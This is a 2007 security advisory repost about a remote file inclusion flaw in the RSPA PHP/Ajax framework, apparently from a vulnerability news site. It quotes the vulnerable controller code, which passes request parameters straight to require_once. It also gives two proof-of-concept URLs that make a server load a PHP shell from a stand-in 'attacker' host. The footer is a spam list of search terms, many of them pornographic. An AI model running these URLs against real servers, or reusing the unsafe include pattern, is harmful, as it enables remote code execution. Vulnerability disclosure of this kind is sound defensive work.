about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Really Simple PHP and Ajax (RSPA) 2007-03-23 RFI Vulnerability




2007-04-02 Really Simple PHP and Ajax (RSPA) 2007-03-23 RFI Vulnerability
Rated as : Moderate Risk

RSPA Remote File Inclusion

Really Simple PHP and Ajax (RSPA)
RSPA is a component based event driven ajax enabled framework for PHP4 and
PHP 5. It is a combination of plane PHP class and HTML/Javascript.RSPA
allows calling server side PHP functions from client javascript events.
Visit http://rspa.sourceforge.net

Credit:
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir

http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6

Vulnerable Systems:
Version: rspa-2007-03-23

Description:
Input passed to the" __IncludeFilePHPClass ", "
__ClassPath" and " __class" parameters in
"rspa/framework/Controller_v5.php" and "
rspa/framework/Controller_v4.php " is not properly verified before
being used to include files. This can be exploited to execute arbitrary PHP
code by including files from local or external resources.


read more about file inclusion in http://www.bugtraq.ir/articles

Vulnerable Code :
require_once("rspaconf.inc.php");

	$className = $_REQUEST['__class'];
	$methordName =  $_REQUEST['__methord'];

	// IncludeFile for PHP Class
		if ($_REQUEST['__IncludeFilePHPClass']){
			$filename = $_REQUEST['__IncludeFilePHPClass'];
			require_once ($filename);
		}

	// Parms
		if (isset($_REQUEST['__parameters'])){$parameter =
getParms($_REQUEST['__parameters']);}else{$parameter="";}

	// ClassFile + ClassPath
		include ("../components/Form.class.php");
	 	if ($_REQUEST["__ClassPath"]=="null" ||
empty($_REQUEST["__ClassPath"])){
	 		$filename =
$RSPA['class_folder'].$className.$RSPA['class_extension'];
	 	}else{
	 		$filename =
$_REQUEST["__ClassPath"].$className.$RSPA['class_extension'];
	 	}
	 	require_once($filename);



POC exploit :
The following URL will cause remote file inclusion

http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://attacker/phpshell.txt/?
http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt/?

[ http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6 ]
securitydot.net - 2007-04-02

Advertising

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 18:00:20 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
grup sex Shilpa sha FTVGIRLS.C Pilem www.thaise www.sozhao Home+sex naked ladi indian sex Wap.sex la mambo Remo Dudhwali.c OpenBSD 3. weather/hw ti php-nuke 2 t935t Sax video WWW.89.COM wap.moboob t935t Www.Xxx.Co dog fuck w MBOX6.com+ news for c bebo sign www.sexco. Www.touchg www.naruto None t758t nud bollyw Fars blue flime Video porn mambo Remo shakeelase Www.touchg amrika ass Searching php-nuke 2 shakeelase apache 2.2 clipart Www.touchg t213t lalat.com search/exp t974t News Searc